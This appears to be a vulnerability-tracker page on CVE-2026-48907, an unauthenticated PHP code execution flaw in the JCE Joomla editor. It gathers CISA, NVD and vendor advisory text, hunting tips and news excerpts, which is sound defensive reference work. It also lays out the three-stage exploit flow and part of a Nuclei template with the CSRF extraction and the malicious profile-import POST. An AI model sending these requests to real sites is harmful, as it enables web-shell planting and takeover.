CVE-2026-48907
published 2026-06-05CVE-2026-48907: A vulnerability in the JCE editor extension for Joomla allows the creation of new editor profiles for unauthenticated users, ultimately resulting in PHP code…
PriorityP198critical10CVSS 4.0
AVNACLATNPRNUINVCHVIHVAHSCHSIHSAHEACRXIRXARXMAVXMACXMATXMPRXMUIXMVCXMVIXMVAXMSCXMSIXMSAXSXAUYRXVXREXURed
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2026-06-19
Exploited in the wild
EPSS
80.42%
99.6th percentile
A vulnerability in the JCE editor extension for Joomla allows the creation of new editor profiles for unauthenticated users, ultimately resulting in PHP code upload and execution.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomlacontenteditor.net | joomla_content_editor_extension_for_joomla | — | — |
Detection & IOCsextracted from sources · hover to see the quote
urlPOST /index.php?option=com_jce HTTP/1.1
filenamenuclei-<md5(Hostname+'phuJ4OoP')>.xml.php
path/tmp/nuclei-<md5(Hostname+'phuJ4OoP')>.xml.php
- →Hunt for unauthenticated POST requests to /index.php?option=com_jce with task=profiles.import in web server access logs — this is the exploit entry point. ↗
- →Look for suspicious/rogue editor profiles created in JCE — attackers import a malicious profile to stage a web shell for persistent backdoor access. ↗
- →Check the Joomla /tmp/ directory for .xml.php double-extension files — the exploit PoC drops a file named nuclei-<md5hash>.xml.php there.
- →The exploit uses a multipart form-data POST with a profile_file field containing a filename with a .xml.php double extension to bypass upload filters.
- →Updating JCE closes the entry point but does NOT remove attacker artifacts — scan for web shells and rogue profiles even after patching. ↗
- →The exploit flow is three-stage: (1) GET homepage to extract CSRF token, (2) POST malicious profile import with CSRF token, (3) GET the dropped .xml.php web shell to confirm execution.
- →CSRF token is extracted from the page body via regex pattern matching '"csrf.token" : "<32 hex chars>"' and reused in the exploit POST request.
- ·The patched version differs between sources: BleepingComputer states the fix is in JCE Pro 2.9.99.6, while The Hacker News states it was patched in version 2.9.99.5 released June 3, 2026. Verify the exact minimum safe version against the vendor changelog before deploying detection version-exclusion rules. ↗
- ·The affected version range is JCE 1.0.0 through 2.9.99.4 per The Hacker News; ensure detection/inventory queries cover this full historical range. ↗
CVSS provenance
nvdv4.010.0CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:A/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:X/V:X/RE:X/U:Red
vulncheck10.0CRITICAL
cisa10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
joomlacontenteditor Content Editor Extension up to 2.9.99.4 on Joomla JCE Editor Extension access control (EUVD-2026-34789)
vuldb·2026-06-17·CVSS 10.0
CVE-2026-48907 [CRITICAL] joomlacontenteditor Content Editor Extension up to 2.9.99.4 on Joomla JCE Editor Extension access control (EUVD-2026-34789)
A vulnerability has been found in joomlacontenteditor Content Editor Extension up to 2.9.99.4 on Joomla and classified as critical. Affected by this issue is some unknown functionality of the component JCE Editor Extension. This manipulation causes improper access controls.
This vulnerability is registered as CVE-2026-48907. Remote exploitation of the attack is possible. Furthermore, an exploit is available.
GHSA
A vulnerability in the JCE editor extension for Joomla allows the creation of new editor profiles for unauthenticated users, ultimately resulting in PHP code upload and execution.
ghsa_unreviewed·2026-06-05
CVE-2026-48907 [CRITICAL] CWE-284 A vulnerability in the JCE editor extension for Joomla allows the creation of new editor profiles for unauthenticated users, ultimately resulting in PHP code upload and execution.
A vulnerability in the JCE editor extension for Joomla allows the creation of new editor profiles for unauthenticated users, ultimately resulting in PHP code upload and execution.
VulnCheck
Improper Access Control
vulncheck·2026·CVSS 10.0
CVE-2026-48907 [CRITICAL] Improper Access Control
Improper Access Control
A vulnerability in the JCE editor extension for Joomla allows the creation of new editor profiles for unauthenticated users, ultimately resulting in PHP code upload and execution.
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.acn.gov.it/portale/w/joomla-jce-sfruttamento-attivo-in-rete-della-cve-2026-48907
Exploit PoC: https://vulncheck.com/xdb/609673988f8e; https://vulncheck.com/xdb/7b5f88d13907; https://vulncheck.com/xdb/584961b43d7c
CISA
Widget Factory Joomla Content Editor Improper Access Control Vulnerability
cisa·2026-06-16·CVSS 10.0
CVE-2026-48907 [CRITICAL] CWE-284 Widget Factory Joomla Content Editor Improper Access Control Vulnerability
Vulnerability: Widget Factory Joomla Content Editor Improper Access Control Vulnerability
Affected: Widget Factory Joomla Content Editor
Widget Factory Joomla Content Editor contains an improper access control vulnerability which could allow for upload and execution of PHP code via the creation of new editor profiles for unauthenticated users.
Required Action: Apply mitigations in accordance with vendor instructions, ensuring compliance with CISA’s BOD 26-04 Prioritizing Security Updates Based on Risk (see URL in Notes) guidance and CISA’s “Forensics Triage Requirements” (see URL in Notes). Follow applicable BOD 26-04 guidance for cloud services or discontinue use of the product if mitigations are unavailable. Stakeholders are responsible for evaluating each asset's internet exposure and
No detection rules found.
Nuclei
Joomla! JCE extension < 2.9.99.5 unauthenticated RCE
nuclei·CVSS 10.0
CVE-2026-48907 [CRITICAL] Joomla! JCE extension < 2.9.99.5 unauthenticated RCE
Joomla! JCE extension "
tmp_file: "{{'nuclei-' + md5(Hostname + 'phuJ4OoP')}}.xml.php"
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "status_code == 200"
- 'contains(body, "Joomla")'
- 'contains(body, "csrf.token")'
condition: and
internal: true
extractors:
- type: regex
name: csrf_token
part: body
group: 1
internal: true
regex:
- '"csrf\.token"\s*:\s*"([a-f0-9]{32})"'
- raw:
- |
POST /index.php?option=com_jce HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=66dea244639dd05378afdad58c2c9c1d
--66dea244639dd05378afdad58c2c9c1d
Content-Disposition: form-data; name="task"
profiles.import
--66dea244639dd05378afdad58c2c9c1d
Content-Disposition: form-data; name="{{csrf_token}}"
1
--66dea244639dd05
Hackernews
⚡ Weekly Recap: Browser Bugs, EDR Killers, TV Botnet, OpenBSD Flaw, Android Trojan, and More
blogs_hackernews·2026-06-22·CVSS 9.8
CVE-2026-24858 [CRITICAL] ⚡ Weekly Recap: Browser Bugs, EDR Killers, TV Botnet, OpenBSD Flaw, Android Trojan, and More
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## ⚡ Weekly Recap: Browser Bugs, EDR Killers, TV Botnet, OpenBSD Flaw, Android Trojan, and More
It’s Monday again.
This week’s threat list looks painfully familiar: abused integrations, fake tools, poisoned websites, ransomware crews trying to shut down security tools, and mobile malware asking for way too much control.
The annoying part is how little of this feels new. Weak credentials, sketchy downloads, browser extensions with too much access, and WordPress sites are used to push more attacks. Nothing clever. Just sloppy, cheap, and effective.
Here’s the Monday recap. Let’s get into the week’s mess.
## ⚡ Threat of the We
Bleepingcomputer
CISA orders feds to patch max severity Joomla plugin flaw by Friday
blogs_bleepingcomputer·2026-06-17·CVSS 10.0
CVE-2026-48907 [CRITICAL] CISA orders feds to patch max severity Joomla plugin flaw by Friday
## CISA orders feds to patch max severity Joomla plugin flaw by Friday
## Sergiu Gatlan
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has ordered federal agencies to patch a maximum-severity flaw in the Widget Factory Joomla Content Editor (JCE) plugin that is being actively exploited in the wild.
Tracked as CVE-2026-48907 , this vulnerability can be exploited by threat actors without privileges to achieve code execution via low-complexity attacks targeting Joomla deployments that use the JCE WYSIWYG editor plugin.
"Widget Factory Joomla Content Editor contains an improper access control vulnerability which could allow for upload and execution of PHP code via the creation of new editor profiles for unauthenticated users," CISA warned on Tuesday.
The JCE security tea
Hackernews
CISA Warns of Actively Exploited Joomla JCE Flaw Allowing PHP Code Execution
blogs_hackernews·2026-06-17·CVSS 10.0
CVE-2026-48907 [CRITICAL] CISA Warns of Actively Exploited Joomla JCE Flaw Allowing PHP Code Execution
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## CISA Warns of Actively Exploited Joomla JCE Flaw Allowing PHP Code Execution
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a maximum-severity security flaw impacting Widget Factory Joomla Content Editor (JCE) to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.
The vulnerability, tracked as CVE-2026-48907 (CVSS score: 10.0), is a case of improper access control that could facilitate arbitrary code execution.
"Widget Factory Joomla Content Editor contains an improper access control vulnerability which could allow for upload and execution of PHP code
2026-06-05
Published
2026-06-16
Added to CISA KEV
Exploited in the wild